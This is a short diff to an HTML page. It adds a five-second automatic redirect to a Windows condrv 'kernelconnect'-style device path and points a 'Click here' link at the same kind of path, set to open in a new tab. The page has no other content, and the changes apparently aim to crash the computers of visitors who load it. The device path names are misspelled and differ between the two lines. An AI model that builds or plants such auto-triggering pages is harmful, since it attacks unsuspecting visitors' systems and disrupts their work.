--- a/index.html
+++ b/index.html
@@ -2,9 +2,9 @@
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
-
+<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=\\.\globalroot\device\condrv\keerrnelconnect">
 </head>
 <body>
-<a href='\\.\globalroot\device\condrv\keernrenlconnect'>Click here</a>
+<a href="\\.\globalroot\device\condrv\keernrenlconnect" target="_blank">Click here</a>
 </body>
 </html>
